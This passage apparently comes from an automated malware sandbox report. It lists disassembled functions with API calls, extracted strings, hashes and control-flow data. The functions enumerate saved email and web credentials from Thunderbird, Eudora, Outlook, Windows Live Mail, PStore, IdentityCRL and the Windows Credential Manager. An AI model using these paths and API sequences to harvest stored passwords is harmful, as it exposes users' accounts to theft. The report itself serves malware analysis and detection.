                                                                                                                                                                                    • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                    Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                    • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                    • API String ID: 1846531875-4223776976
                                                                                                                                                                                    • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                    Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,761F0A60,?,00000000,?,?,?,0040CF60,761F0A60), ref: 00404AB8
                                                                                                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,761F0A60), ref: 00404ADE
                                                                                                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                    • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                    Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                    • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                                    Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                    • String ID: h4ND
                                                                                                                                                                                    • API String ID: 3662548030-3825183422
                                                                                                                                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                                                                                                    Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                                                                                                    • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                    • API String ID: 832325562-2578778931
                                                                                                                                                                                    • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                    • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                    Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                                                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                    Function 004086E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 331 4086e0-408704 call 4045db 334 4088f7-408906 call 404656 331->334 335 40870a-408716 331->335 337 408718-40872b CredEnumerateW 335->337 338 40872d-408731 335->338 337->338 338->334 341 408737-408764 wcslen 338->341 343 40876a 341->343 344 4088ef-4088f3 LocalFree 341->344 345 40876f-408774 343->345 344->334 345->344 346 40877a-40879e wcsncmp 345->346 347 4087a4-4087bb 346->347 348 4088dd-4088e9 346->348 347->347 349 4087bd-4087ee call 40466b call 404734 347->349 348->344 348->345 354 4088d1-4088d8 call 404785 349->354 355 4087f4-40880c call 4047a5 349->355 354->348 355->354 359 408812-408838 memset 355->359 360 40883a 359->360 361 40883c-4088a9 memcpy wcschr 359->361 360->361 362 4088b7-4088cb LocalFree 361->362 363 4088ab-4088b3 361->363 362->354 363->362
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                    • LocalFree.KERNELBASE(?), ref: 004088F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                    • API String ID: 3950215071-260894208
                                                                                                                                                                                    • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                    Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 365 4037ca-40381c memset * 2 call 444551 368 4038e2-4038e5 365->368 369 403822-403882 call 4021b6 call 406f06 * 2 strchr 365->369 376 403884-403895 _mbscpy 369->376 377 403897-4038a2 strlen 369->377 378 4038bf-4038dd _mbscpy call 4023e5 376->378 377->378 379 4038a4-4038bc sprintf 377->379 378->368 379->378
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                                                    • API String ID: 317221925-3288273942
                                                                                                                                                                                    • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
